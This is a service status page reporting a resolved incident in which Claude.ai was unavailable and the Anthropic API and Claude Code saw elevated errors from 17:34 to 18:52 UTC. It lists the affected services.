Claude.ai unavailable and elevated errors on the API Resolved This incident has been resolved. Monitoring We are seeing success rates across all services return to normal, and are monitoring closely to prevent any further issues. Impact occurred from 17:34–18:52 UTC. Update We are continuing to work to resolve the issues preventing users from accessing Claude.ai, and causing elevated authentication errors for requests to the API and Claude Code. Identified We have identified an issue resulting in elevated errors on the Anthropic API, as well as issues accessing Claude.ai, including log-in paths for Claude Code. We are working to resolve these issues, and will provide an update as soon as possible. Investigating We are investigating an issue preventing users from reaching Claude.ai, and will provide an update as soon as possible. This incident affected: claude.ai, Claude Console (platform.claude.com), Claude API (api.anthropic.com), Claude Code, Claude Cowork, and Claude for Government.
▸ 展开全文